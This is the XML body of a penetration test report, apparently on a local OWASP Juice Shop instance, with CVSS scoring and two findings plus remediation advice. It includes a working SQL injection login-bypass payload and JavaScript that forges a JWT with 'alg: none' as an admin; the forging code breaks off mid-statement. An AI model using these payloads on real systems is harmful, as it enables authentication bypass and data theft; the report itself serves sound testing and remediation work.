    <w:bookmarkStart w:id="17" w:name="cvss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The risk assessment of the vulnerabilities found is performed using the industry standard Common Vulnerability Scoring System v4.0 (hereinafter referred to as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“CVSS”</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four groups:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Base”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Threat”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Environmental”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Supplemental”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. To determine the vulnerability scores, each group has its own rules. The values of the Base group are invariant in time and remain the same in different environments. In the Threat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 The Supplemental group provides additional context that does not modify the final score.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The CVSS ratings are numerical values on a scale of 0.0 to 10.0, with the highest vulnerability of a system occurring at a value of 10.0. Our rating is based on the CVSS-B (Base Score) and is composed of:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack Vector (AV)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack Complexity (AC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack Requirements (AT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Privileges Required (PR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User Interaction (UI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerable System Impact: Confidentiality (VC), Integrity (VI), Availability (VA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Subsequent System Impact: Confidentiality (SC), Integrity (SI), Availability (SA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As penetration testers, we can only assess the general threats posed by a vulnerability (CVSS-B). However, we have no insight into the internal structures of our clients. Therefore, the assessment of the specific risks for the client’s systems and business processes must be done by the client. For this purpose, CVSS offers the Environmental metrics (CVSS-BE).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16">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CVSS v4.0 Specification</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:id="18"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v4.0 standard:</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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Category Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compac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pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compac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pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compac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pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compac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pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compac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18"/>
    <w:bookmarkStart w:id="19"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4"/>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4"/>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4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fixed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The vulnerability has been remediated and verified through retesting.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="summary-of-findings"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Summary of Findings</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1092"/>
        <w:gridCol w:w="3004"/>
        <w:gridCol w:w="2048"/>
        <w:gridCol w:w="1775"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Finding Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS v4 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQL Injection in Login Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JWT</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">‘none’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Algorithm Vulnerability - Authentication Bypass and Token Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="27" w:name="findings-and-remediation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Findings and Remediation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="24" w:name="finding"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="23" w:name="sql-injection-in-login-endpoint"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL Injection in Login Endpoint</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9.1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:hyperlink r:id="rId22">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">POST /rest/user/login</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/rest/user/login endpoint is vulnerable to SQL injection via the email parameter. By injecting the payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“admin@juice-sh.op’ OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=’1”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">into the email field, an attacker can bypass authentication and gain access as any user, including administrators. The application constructs SQL queries by directly concatenating user input without proper sanitization or parameterization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Send POST request to http://localhost:3333/rest/user/login with JSON body:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“email”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“admin@juice-sh.op’ OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=’1”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“password”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“test”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observe successful authentication with admin privileges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT token is returned with admin user data including password hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attacker gains full administrative access without knowing valid credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use parameterized queries (prepared statements) for all database operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement input validation and sanitization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use an ORM that handles parameterization automatically</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply principle of least privilege for database connections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement proper error handling that does not expose database details</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="26" w:name="finding-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="25" w:name="X1448106250701bed6dca3b953f9a21a46e43acc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Algorithm Vulnerability - Authentication Bypass and Token Forgery</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9.1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:hyperlink r:id="rId22">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">localStorage token storage, GET /api/Users/, GET /api/Products/, JWT authentication mechanism</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application accepts JWT tokens with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘alg’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in the header, which disables signature verification. This allows an attacker to forge arbitrary tokens, impersonate any user (including administrators), and bypass all authentication controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerability was confirmed by:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Discovering a JWT token in localStorage with header: {</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“typ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“JWT”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“alg”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“none”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Successfully accessing the admin /api/Users/ endpoint with the unsigned token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Creating a completely forged token with fabricated user claims (id: 999, email: hacker@evil.com, role: admin)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. The forged token was accepted by the API, granting unauthorized admin access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The token contains sensitive information including password hashes (MD5), roles, and user IDs, further exacerbating the risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Original vulnerable token found in localStorage:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Header: {</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“typ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“JWT”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“alg”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“none”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Payload: Contains admin user data including password hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Access admin API with original token:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET http://localhost:3333/api/Users/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Response: 200 OK - All 42 user records returned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Forge a new admin token:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">typ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"JWT"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">alg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"none"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</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"success"</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999</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"hacker"</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"hacker@evil.com"</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">isActive</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
